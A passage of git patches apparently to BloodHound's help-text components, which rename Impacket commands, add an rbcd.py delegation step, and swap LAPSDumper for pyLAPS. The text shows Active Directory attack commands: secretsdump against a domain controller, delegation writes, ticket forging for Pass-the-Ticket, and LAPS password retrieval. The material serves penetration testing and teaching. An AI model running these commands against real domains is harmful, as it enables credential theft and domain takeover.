+                        "secretsdump.py 'testlab.local'/'Administrator':'Password'@'DOMAINCONTROLLER'"
                     }
                 </code>
             </pre>
diff --git a/src/components/Modals/HelpTexts/GetChanges/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/GetChanges/LinuxAbuse.jsx
index 0d0855642..f30480e7c 100644
--- a/src/components/Modals/HelpTexts/GetChanges/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/GetChanges/LinuxAbuse.jsx
@@ -11,7 +11,7 @@ const LinuxAbuse = () => {
             <pre>
                 <code>
                     {
-                        "secretsdump 'testlab.local'/'Administrator':'Password'@'DOMAINCONTROLLER'"
+                        "secretsdump.py 'testlab.local'/'Administrator':'Password'@'DOMAINCONTROLLER'"
                     }
                 </code>
             </pre>
diff --git a/src/components/Modals/HelpTexts/GetChangesAll/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/GetChangesAll/LinuxAbuse.jsx
index 0d0855642..f30480e7c 100644
--- a/src/components/Modals/HelpTexts/GetChangesAll/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/GetChangesAll/LinuxAbuse.jsx
@@ -11,7 +11,7 @@ const LinuxAbuse = () => {
             <pre>
                 <code>
                     {
-                        "secretsdump 'testlab.local'/'Administrator':'Password'@'DOMAINCONTROLLER'"
+                        "secretsdump.py 'testlab.local'/'Administrator':'Password'@'DOMAINCONTROLLER'"
                     }
                 </code>
             </pre>

From 4c6d44aa8c02220530eaece97a592d46a69b2f22 Mon Sep 17 00:00:00 2001
From: Shutdown <40902872+ShutdownRepo@users.noreply.github.com>
Date: Fri, 20 Jan 2023 17:36:29 +0100
Subject: [PATCH 31/32] Adding missing rbcd.py step for GenericAll,
 GenericWrite, Owns, WriteDacl, WriteOwner

---
 .../HelpTexts/GenericAll/LinuxAbuse.jsx       | 72 +++++++++----------
 .../HelpTexts/GenericWrite/LinuxAbuse.jsx     | 36 +++++-----
 .../Modals/HelpTexts/Owns/LinuxAbuse.jsx      | 72 +++++++++----------
 .../Modals/HelpTexts/WriteDacl/LinuxAbuse.jsx | 72 +++++++++----------
 .../HelpTexts/WriteOwner/LinuxAbuse.jsx       | 72 +++++++++----------
 5 files changed, 162 insertions(+), 162 deletions(-)

diff --git a/src/components/Modals/HelpTexts/GenericAll/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/GenericAll/LinuxAbuse.jsx
index 7b16993c5..20e4c7696 100644
--- a/src/components/Modals/HelpTexts/GenericAll/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/GenericAll/LinuxAbuse.jsx
@@ -177,12 +177,9 @@ const LinuxAbuse = ({
 
                         <h4> Resource-Based Constrained Delegation </h4>
 
-                        <p>
-                            First, if an attacker does not control an account with an
-                            SPN set, a new attacker-controlled computer account can be
-                            added with Impacket's addcomputer.py example script:
-                        </p>
-
+                        First, if an attacker does not control an account with an
+                        SPN set, a new attacker-controlled computer account can be
+                        added with Impacket's addcomputer.py example script:
                         <pre>
                             <code>
                                 {
@@ -190,13 +187,19 @@ const LinuxAbuse = ({
                                 }
                             </code>
                         </pre>
-
-                        <p>
-                            We can then get a service ticket for the service name (sname) we
-                            want to "pretend" to be "admin" for. Impacket's getST.py example script
-                            can be used for that purpose.
-                        </p>
-
+                        We now need to configure the target object so that the attacker-controlled
+                        computer can delegate to it. Impacket's rbcd.py script can be used for that
+                        purpose:
+                        <pre>
+                            <code>
+                                {
+                                    "rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'TargetComputer' -action 'write' 'domain/user:password'"
+                                }
+                            </code>
+                        </pre>
+                        And finally we can get a service ticket for the service name (sname) we
+                        want to "pretend" to be "admin" for. Impacket's getST.py example script
+                        can be used for that purpose.
                         <pre>
                             <code>
                                 {
@@ -204,11 +207,8 @@ const LinuxAbuse = ({
                                 }
                             </code>
                         </pre>
-
-                        <p>
-                            This ticket can then be used with Pass-the-Ticket, and could grant access
-                            to the file system of the TARGETCOMPUTER.
-                        </p>
+                        This ticket can then be used with Pass-the-Ticket, and could grant access
+                        to the file system of the TARGETCOMPUTER.
 
                         <h4> Shadow Credentials attack </h4>
 
@@ -228,12 +228,9 @@ const LinuxAbuse = ({
                     <>
                         <h4> Resource-Based Constrained Delegation </h4>
 
-                        <p>
-                            First, if an attacker does not control an account with an
-                            SPN set, a new attacker-controlled computer account can be
-                            added with Impacket's addcomputer.py example script:
-                        </p>
-
+                        First, if an attacker does not control an account with an
+                        SPN set, a new attacker-controlled computer account can be
+                        added with Impacket's addcomputer.py example script:
                         <pre>
                             <code>
                                 {
@@ -241,13 +238,19 @@ const LinuxAbuse = ({
                                 }
                             </code>
                         </pre>
-
-                        <p>
-                            We can then get a service ticket for the service name (sname) we
-                            want to "pretend" to be "admin" for. Impacket's getST.py example script
-                            can be used for that purpose.
-                        </p>
-
+                        We now need to configure the target object so that the attacker-controlled
+                        computer can delegate to it. Impacket's rbcd.py script can be used for that
+                        purpose:
+                        <pre>
+                            <code>
+                                {
+                                    "rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'TargetComputer' -action 'write' 'domain/user:password'"
+                                }
+                            </code>
+                        </pre>
+                        And finally we can get a service ticket for the service name (sname) we
+                        want to "pretend" to be "admin" for. Impacket's getST.py example script
+                        can be used for that purpose.
                         <pre>
                             <code>
                                 {
@@ -255,11 +258,8 @@ const LinuxAbuse = ({
                                 }
                             </code>
                         </pre>
-
-                        <p>
-                            This ticket can then be used with Pass-the-Ticket, and could grant access
-                            to the file system of the TARGETCOMPUTER.
-                        </p>
+                        This ticket can then be used with Pass-the-Ticket, and could grant access
+                        to the file system of the TARGETCOMPUTER.
 
                         <h4> Shadow Credentials attack </h4>
 
diff --git a/src/components/Modals/HelpTexts/GenericWrite/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/GenericWrite/LinuxAbuse.jsx
index de7650592..25eee7d83 100644
--- a/src/components/Modals/HelpTexts/GenericWrite/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/GenericWrite/LinuxAbuse.jsx
@@ -98,12 +98,9 @@ const LinuxAbuse = ({ sourceName, sourceType, targetType }) => {
                 <>
                     <h4> Resource-Based Constrained Delegation </h4>
 
-                    <p>
-                        First, if an attacker does not control an account with an
-                        SPN set, a new attacker-controlled computer account can be
-                        added with Impacket's addcomputer.py example script:
-                    </p>
-
+                    First, if an attacker does not control an account with an
+                    SPN set, a new attacker-controlled computer account can be
+                    added with Impacket's addcomputer.py example script:
                     <pre>
                         <code>
                             {
@@ -111,13 +108,19 @@ const LinuxAbuse = ({ sourceName, sourceType, targetType }) => {
                             }
                         </code>
                     </pre>
-
-                    <p>
-                        We can then get a service ticket for the service name (sname) we
-                        want to "pretend" to be "admin" for. Impacket's getST.py example script
-                        can be used for that purpose.
-                    </p>
-
+                    We now need to configure the target object so that the attacker-controlled
+                    computer can delegate to it. Impacket's rbcd.py script can be used for that
+                    purpose:
+                    <pre>
+                        <code>
+                            {
+                                "rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'TargetComputer' -action 'write' 'domain/user:password'"
+                            }
+                        </code>
+                    </pre>
+                    And finally we can get a service ticket for the service name (sname) we
+                    want to "pretend" to be "admin" for. Impacket's getST.py example script
+                    can be used for that purpose.
                     <pre>
                         <code>
                             {
@@ -125,11 +128,8 @@ const LinuxAbuse = ({ sourceName, sourceType, targetType }) => {
                             }
                         </code>
                     </pre>
-
-                    <p>
-                        This ticket can then be used with Pass-the-Ticket, and could grant access
-                        to the file system of the TARGETCOMPUTER.
-                    </p>
+                    This ticket can then be used with Pass-the-Ticket, and could grant access
+                    to the file system of the TARGETCOMPUTER.
 
                     <h4> Shadow Credentials attack </h4>
 
diff --git a/src/components/Modals/HelpTexts/Owns/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/Owns/LinuxAbuse.jsx
index 31e275352..067cb5c71 100644
--- a/src/components/Modals/HelpTexts/Owns/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/Owns/LinuxAbuse.jsx
@@ -251,12 +251,9 @@ const LinuxAbuse = ({
 
                         <h4> Resource-Based Constrained Delegation </h4>
 
-                        <p>
-                            First, if an attacker does not control an account with an
-                            SPN set, a new attacker-controlled computer account can be
-                            added with Impacket's addcomputer.py example script:
-                        </p>
-
+                        First, if an attacker does not control an account with an
+                        SPN set, a new attacker-controlled computer account can be
+                        added with Impacket's addcomputer.py example script:
                         <pre>
                             <code>
                                 {
@@ -264,13 +261,19 @@ const LinuxAbuse = ({
                                 }
                             </code>
                         </pre>
-
-                        <p>
-                            We can then get a service ticket for the service name (sname) we
-                            want to "pretend" to be "admin" for. Impacket's getST.py example script
-                            can be used for that purpose.
-                        </p>
-
+                        We now need to configure the target object so that the attacker-controlled
+                        computer can delegate to it. Impacket's rbcd.py script can be used for that
+                        purpose:
+                        <pre>
+                            <code>
+                                {
+                                    "rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'TargetComputer' -action 'write' 'domain/user:password'"
+                                }
+                            </code>
+                        </pre>
+                        And finally we can get a service ticket for the service name (sname) we
+                        want to "pretend" to be "admin" for. Impacket's getST.py example script
+                        can be used for that purpose.
                         <pre>
                             <code>
                                 {
@@ -278,11 +281,8 @@ const LinuxAbuse = ({
                                 }
                             </code>
                         </pre>
-
-                        <p>
-                            This ticket can then be used with Pass-the-Ticket, and could grant access
-                            to the file system of the TARGETCOMPUTER.
-                        </p>
+                        This ticket can then be used with Pass-the-Ticket, and could grant access
+                        to the file system of the TARGETCOMPUTER.
 
                         <h4> Shadow Credentials attack </h4>
 
@@ -324,12 +324,9 @@ const LinuxAbuse = ({
 
                         <h4> Resource-Based Constrained Delegation </h4>
 
-                        <p>
-                            First, if an attacker does not control an account with an
-                            SPN set, a new attacker-controlled computer account can be
-                            added with Impacket's addcomputer.py example script:
-                        </p>
-
+                        First, if an attacker does not control an account with an
+                        SPN set, a new attacker-controlled computer account can be
+                        added with Impacket's addcomputer.py example script:
                         <pre>
                             <code>
                                 {
@@ -337,13 +334,19 @@ const LinuxAbuse = ({
                                 }
                             </code>
                         </pre>
-
-                        <p>
-                            We can then get a service ticket for the service name (sname) we
-                            want to "pretend" to be "admin" for. Impacket's getST.py example script
-                            can be used for that purpose.
-                        </p>
-
+                        We now need to configure the target object so that the attacker-controlled
+                        computer can delegate to it. Impacket's rbcd.py script can be used for that
+                        purpose:
+                        <pre>
+                            <code>
+                                {
+                                    "rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'TargetComputer' -action 'write' 'domain/user:password'"
+                                }
+                            </code>
+                        </pre>
+                        And finally we can get a service ticket for the service name (sname) we
+                        want to "pretend" to be "admin" for. Impacket's getST.py example script
+                        can be used for that purpose.
                         <pre>
                             <code>
                                 {
@@ -351,11 +354,8 @@ const LinuxAbuse = ({
                                 }
                             </code>
                         </pre>
-
-                        <p>
-                            This ticket can then be used with Pass-the-Ticket, and could grant access
-                            to the file system of the TARGETCOMPUTER.
-                        </p>
+                        This ticket can then be used with Pass-the-Ticket, and could grant access
+                        to the file system of the TARGETCOMPUTER.
 
                         <h4> Shadow Credentials attack </h4>
 
diff --git a/src/components/Modals/HelpTexts/WriteDacl/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/WriteDacl/LinuxAbuse.jsx
index 9bb171f05..d4b647434 100644
--- a/src/components/Modals/HelpTexts/WriteDacl/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/WriteDacl/LinuxAbuse.jsx
@@ -251,12 +251,9 @@ const LinuxAbuse = ({
 
                         <h4> Resource-Based Constrained Delegation </h4>
 
-                        <p>
-                            First, if an attacker does not control an account with an
-                            SPN set, a new attacker-controlled computer account can be
-                            added with Impacket's addcomputer.py example script:
-                        </p>
-
+                        First, if an attacker does not control an account with an
+                        SPN set, a new attacker-controlled computer account can be
+                        added with Impacket's addcomputer.py example script:
                         <pre>
                             <code>
                                 {
@@ -264,13 +261,19 @@ const LinuxAbuse = ({
                                 }
                             </code>
                         </pre>
-
-                        <p>
-                            We can then get a service ticket for the service name (sname) we
-                            want to "pretend" to be "admin" for. Impacket's getST.py example script
-                            can be used for that purpose.
-                        </p>
-
+                        We now need to configure the target object so that the attacker-controlled
+                        computer can delegate to it. Impacket's rbcd.py script can be used for that
+                        purpose:
+                        <pre>
+                            <code>
+                                {
+                                    "rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'TargetComputer' -action 'write' 'domain/user:password'"
+                                }
+                            </code>
+                        </pre>
+                        And finally we can get a service ticket for the service name (sname) we
+                        want to "pretend" to be "admin" for. Impacket's getST.py example script
+                        can be used for that purpose.
                         <pre>
                             <code>
                                 {
@@ -278,11 +281,8 @@ const LinuxAbuse = ({
                                 }
                             </code>
                         </pre>
-
-                        <p>
-                            This ticket can then be used with Pass-the-Ticket, and could grant access
-                            to the file system of the TARGETCOMPUTER.
-                        </p>
+                        This ticket can then be used with Pass-the-Ticket, and could grant access
+                        to the file system of the TARGETCOMPUTER.
 
                         <h4> Shadow Credentials attack </h4>
 
@@ -324,12 +324,9 @@ const LinuxAbuse = ({
 
                         <h4> Resource-Based Constrained Delegation </h4>
 
-                        <p>
-                            First, if an attacker does not control an account with an
-                            SPN set, a new attacker-controlled computer account can be
-                            added with Impacket's addcomputer.py example script:
-                        </p>
-
+                        First, if an attacker does not control an account with an
+                        SPN set, a new attacker-controlled computer account can be
+                        added with Impacket's addcomputer.py example script:
                         <pre>
                             <code>
                                 {
@@ -337,13 +334,19 @@ const LinuxAbuse = ({
                                 }
                             </code>
                         </pre>
-
-                        <p>
-                            We can then get a service ticket for the service name (sname) we
-                            want to "pretend" to be "admin" for. Impacket's getST.py example script
-                            can be used for that purpose.
-                        </p>
-
+                        We now need to configure the target object so that the attacker-controlled
+                        computer can delegate to it. Impacket's rbcd.py script can be used for that
+                        purpose:
+                        <pre>
+                            <code>
+                                {
+                                    "rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'TargetComputer' -action 'write' 'domain/user:password'"
+                                }
+                            </code>
+                        </pre>
+                        And finally we can get a service ticket for the service name (sname) we
+                        want to "pretend" to be "admin" for. Impacket's getST.py example script
+                        can be used for that purpose.
                         <pre>
                             <code>
                                 {
@@ -351,11 +354,8 @@ const LinuxAbuse = ({
                                 }
                             </code>
                         </pre>
-
-                        <p>
-                            This ticket can then be used with Pass-the-Ticket, and could grant access
-                            to the file system of the TARGETCOMPUTER.
-                        </p>
+                        This ticket can then be used with Pass-the-Ticket, and could grant access
+                        to the file system of the TARGETCOMPUTER.
 
                         <h4> Shadow Credentials attack </h4>
 
diff --git a/src/components/Modals/HelpTexts/WriteOwner/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/WriteOwner/LinuxAbuse.jsx
index 8045c73db..5fca5cb43 100644
--- a/src/components/Modals/HelpTexts/WriteOwner/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/WriteOwner/LinuxAbuse.jsx
@@ -290,12 +290,9 @@ const LinuxAbuse = ({
 
                         <h4> Resource-Based Constrained Delegation </h4>
 
-                        <p>
-                            First, if an attacker does not control an account with an
-                            SPN set, a new attacker-controlled computer account can be
-                            added with Impacket's addcomputer.py example script:
-                        </p>
-
+                        First, if an attacker does not control an account with an
+                        SPN set, a new attacker-controlled computer account can be
+                        added with Impacket's addcomputer.py example script:
                         <pre>
                             <code>
                                 {
@@ -303,13 +300,19 @@ const LinuxAbuse = ({
                                 }
                             </code>
                         </pre>
-
-                        <p>
-                            We can then get a service ticket for the service name (sname) we
-                            want to "pretend" to be "admin" for. Impacket's getST.py example script
-                            can be used for that purpose.
-                        </p>
-
+                        We now need to configure the target object so that the attacker-controlled
+                        computer can delegate to it. Impacket's rbcd.py script can be used for that
+                        purpose:
+                        <pre>
+                            <code>
+                                {
+                                    "rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'TargetComputer' -action 'write' 'domain/user:password'"
+                                }
+                            </code>
+                        </pre>
+                        And finally we can get a service ticket for the service name (sname) we
+                        want to "pretend" to be "admin" for. Impacket's getST.py example script
+                        can be used for that purpose.
                         <pre>
                             <code>
                                 {
@@ -317,11 +320,8 @@ const LinuxAbuse = ({
                                 }
                             </code>
                         </pre>
-
-                        <p>
-                            This ticket can then be used with Pass-the-Ticket, and could grant access
-                            to the file system of the TARGETCOMPUTER.
-                        </p>
+                        This ticket can then be used with Pass-the-Ticket, and could grant access
+                        to the file system of the TARGETCOMPUTER.
 
                         <h4> Shadow Credentials attack </h4>
 
@@ -376,12 +376,9 @@ const LinuxAbuse = ({
 
                         <h4> Resource-Based Constrained Delegation </h4>
 
-                        <p>
-                            First, if an attacker does not control an account with an
-                            SPN set, a new attacker-controlled computer account can be
-                            added with Impacket's addcomputer.py example script:
-                        </p>
-
+                        First, if an attacker does not control an account with an
+                        SPN set, a new attacker-controlled computer account can be
+                        added with Impacket's addcomputer.py example script:
                         <pre>
                             <code>
                                 {
@@ -389,13 +386,19 @@ const LinuxAbuse = ({
                                 }
                             </code>
                         </pre>
-
-                        <p>
-                            We can then get a service ticket for the service name (sname) we
-                            want to "pretend" to be "admin" for. Impacket's getST.py example script
-                            can be used for that purpose.
-                        </p>
-
+                        We now need to configure the target object so that the attacker-controlled
+                        computer can delegate to it. Impacket's rbcd.py script can be used for that
+                        purpose:
+                        <pre>
+                            <code>
+                                {
+                                    "rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'TargetComputer' -action 'write' 'domain/user:password'"
+                                }
+                            </code>
+                        </pre>
+                        And finally we can get a service ticket for the service name (sname) we
+                        want to "pretend" to be "admin" for. Impacket's getST.py example script
+                        can be used for that purpose.
                         <pre>
                             <code>
                                 {
@@ -403,11 +406,8 @@ const LinuxAbuse = ({
                                 }
                             </code>
                         </pre>
-
-                        <p>
-                            This ticket can then be used with Pass-the-Ticket, and could grant access
-                            to the file system of the TARGETCOMPUTER.
-                        </p>
+                        This ticket can then be used with Pass-the-Ticket, and could grant access
+                        to the file system of the TARGETCOMPUTER.
 
                         <h4> Shadow Credentials attack </h4>
 

From 38abfea34b6e4f08e1a64061e80e032141c804d1 Mon Sep 17 00:00:00 2001
From: Shutdown <40902872+ShutdownRepo@users.noreply.github.com>
Date: Fri, 20 Jan 2023 17:44:30 +0100
Subject: [PATCH 32/32] Replacing LAPSDumper with pyLAPS

---
 .../Modals/HelpTexts/AllExtendedRights/LinuxAbuse.jsx     | 8 ++++----
 src/components/Modals/HelpTexts/GenericAll/LinuxAbuse.jsx | 8 ++++----
 src/components/Modals/HelpTexts/Owns/LinuxAbuse.jsx       | 8 ++++----
 .../Modals/HelpTexts/ReadLAPSPassword/LinuxAbuse.jsx      | 4 ++--
 src/components/Modals/HelpTexts/WriteDacl/LinuxAbuse.jsx  | 8 ++++----
 src/components/Modals/HelpTexts/WriteOwner/LinuxAbuse.jsx | 8 ++++----
 6 files changed, 22 insertions(+), 22 deletions(-)

diff --git a/src/components/Modals/HelpTexts/AllExtendedRights/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/AllExtendedRights/LinuxAbuse.jsx
index b00ff156a..fb9e0c2ad 100644
--- a/src/components/Modals/HelpTexts/AllExtendedRights/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/AllExtendedRights/LinuxAbuse.jsx
@@ -57,14 +57,14 @@ const LinuxAbuse = ({ sourceName, sourceType, targetName, targetType, haslaps })
                         </p>
 
                         <p>
-                            <a href='https://github.com/n00py/LAPSDumper'>LAPSDumper</a> can be used
+                            <a href='https://github.com/p0dalirius/pyLAPS'>pyLAPS</a> can be used
                              to retrieve LAPS passwords:
                         </p>
 
                         <pre>
                             <code>
                                 {
-                                    'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                                    'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
                                 }
                             </code>
                         </pre>
@@ -110,14 +110,14 @@ const LinuxAbuse = ({ sourceName, sourceType, targetName, targetType, haslaps })
                     </p>
 
                     <p>
-                        <a href="https://github.com/n00py/LAPSDumper">LAPSDumper</a> can be used
+                        <a href="https://github.com/p0dalirius/pyLAPS">pyLAPS</a> can be used
                          for that purpose:
                     </p>
 
                     <pre>
                         <code>
                             {
-                                'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                                'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
                             }
                         </code>
                     </pre>
diff --git a/src/components/Modals/HelpTexts/GenericAll/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/GenericAll/LinuxAbuse.jsx
index 20e4c7696..7e3d15fb1 100644
--- a/src/components/Modals/HelpTexts/GenericAll/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/GenericAll/LinuxAbuse.jsx
@@ -163,14 +163,14 @@ const LinuxAbuse = ({
                         </p>
 
                         <p>
-                            <a href='https://github.com/n00py/LAPSDumper'>LAPSDumper</a> can be used
+                            <a href='https://github.com/p0dalirius/pyLAPS'>pyLAPS</a> can be used
                              to retrieve LAPS passwords:
                         </p>
 
                         <pre>
                             <code>
                                 {
-                                    'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                                    'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
                                 }
                             </code>
                         </pre>
@@ -308,14 +308,14 @@ const LinuxAbuse = ({
                     </p>
 
                     <p>
-                        <a href="https://github.com/n00py/LAPSDumper">LAPSDumper</a> can be used
+                        <a href="https://github.com/p0dalirius/pyLAPS">pyLAPS</a> can be used
                          for that purpose:
                     </p>
 
                     <pre>
                         <code>
                             {
-                                'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                                'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
                             }
                         </code>
                     </pre>
diff --git a/src/components/Modals/HelpTexts/Owns/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/Owns/LinuxAbuse.jsx
index 067cb5c71..a1218b7d3 100644
--- a/src/components/Modals/HelpTexts/Owns/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/Owns/LinuxAbuse.jsx
@@ -237,14 +237,14 @@ const LinuxAbuse = ({
                         </p>
 
                         <p>
-                            <a href='https://github.com/n00py/LAPSDumper'>LAPSDumper</a> can be used
+                            <a href='https://github.com/p0dalirius/pyLAPS'>pyLAPS</a> can be used
                              to retrieve LAPS passwords:
                         </p>
 
                         <pre>
                             <code>
                                 {
-                                    'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                                    'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
                                 }
                             </code>
                         </pre>
@@ -428,14 +428,14 @@ const LinuxAbuse = ({
                     </p>
 
                     <p>
-                        <a href="https://github.com/n00py/LAPSDumper">LAPSDumper</a> can be used
+                        <a href="https://github.com/p0dalirius/pyLAPS">pyLAPS</a> can be used
                          for that purpose:
                     </p>
 
                     <pre>
                         <code>
                             {
-                                'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                                'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
                             }
                         </code>
                     </pre>
diff --git a/src/components/Modals/HelpTexts/ReadLAPSPassword/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/ReadLAPSPassword/LinuxAbuse.jsx
index aecd018e9..d0174787a 100644
--- a/src/components/Modals/HelpTexts/ReadLAPSPassword/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/ReadLAPSPassword/LinuxAbuse.jsx
@@ -14,14 +14,14 @@ const LinuxAbuse = ({ sourceName, sourceType }) => {
             </p>
 
             <p>
-                <a href='https://github.com/n00py/LAPSDumper'>LAPSDumper</a> can be used
+                <a href='https://github.com/p0dalirius/pyLAPS'>pyLAPS</a> can be used
                  to retrieve LAPS passwords:
             </p>
 
             <pre>
                 <code>
                     {
-                        'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                        'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
                     }
                 </code>
             </pre>
diff --git a/src/components/Modals/HelpTexts/WriteDacl/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/WriteDacl/LinuxAbuse.jsx
index d4b647434..89cf3543b 100644
--- a/src/components/Modals/HelpTexts/WriteDacl/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/WriteDacl/LinuxAbuse.jsx
@@ -237,14 +237,14 @@ const LinuxAbuse = ({
                         </p>
 
                         <p>
-                            <a href='https://github.com/n00py/LAPSDumper'>LAPSDumper</a> can be used
+                            <a href='https://github.com/p0dalirius/pyLAPS'>pyLAPS</a> can be used
                              to retrieve LAPS passwords:
                         </p>
 
                         <pre>
                             <code>
                                 {
-                                    'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                                    'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
                                 }
                             </code>
                         </pre>
@@ -428,14 +428,14 @@ const LinuxAbuse = ({
                     </p>
 
                     <p>
-                        <a href="https://github.com/n00py/LAPSDumper">LAPSDumper</a> can be used
+                        <a href="https://github.com/p0dalirius/pyLAPS">pyLAPS</a> can be used
                          for that purpose:
                     </p>
 
                     <pre>
                         <code>
                             {
-                                'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                                'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
                             }
                         </code>
                     </pre>
diff --git a/src/components/Modals/HelpTexts/WriteOwner/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/WriteOwner/LinuxAbuse.jsx
index 5fca5cb43..3505e2eee 100644
--- a/src/components/Modals/HelpTexts/WriteOwner/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/WriteOwner/LinuxAbuse.jsx
@@ -276,14 +276,14 @@ const LinuxAbuse = ({
                         </p>
 
                         <p>
-                            <a href='https://github.com/n00py/LAPSDumper'>LAPSDumper</a> can be used
+                            <a href='https://github.com/p0dalirius/pyLAPS'>pyLAPS</a> can be used
                              to retrieve LAPS passwords:
                         </p>
 
                         <pre>
                             <code>
                                 {
-                                    'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                                    'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
                                 }
                             </code>
                         </pre>
@@ -493,14 +493,14 @@ const LinuxAbuse = ({
                     </p>
 
                     <p>
-                        <a href="https://github.com/n00py/LAPSDumper">LAPSDumper</a> can be used
+                        <a href="https://github.com/p0dalirius/pyLAPS">pyLAPS</a> can be used
                          for that purpose:
                     </p>
 
                     <pre>
                         <code>
                             {
-                                'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                                'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
                             }
                         </code>
                     </pre>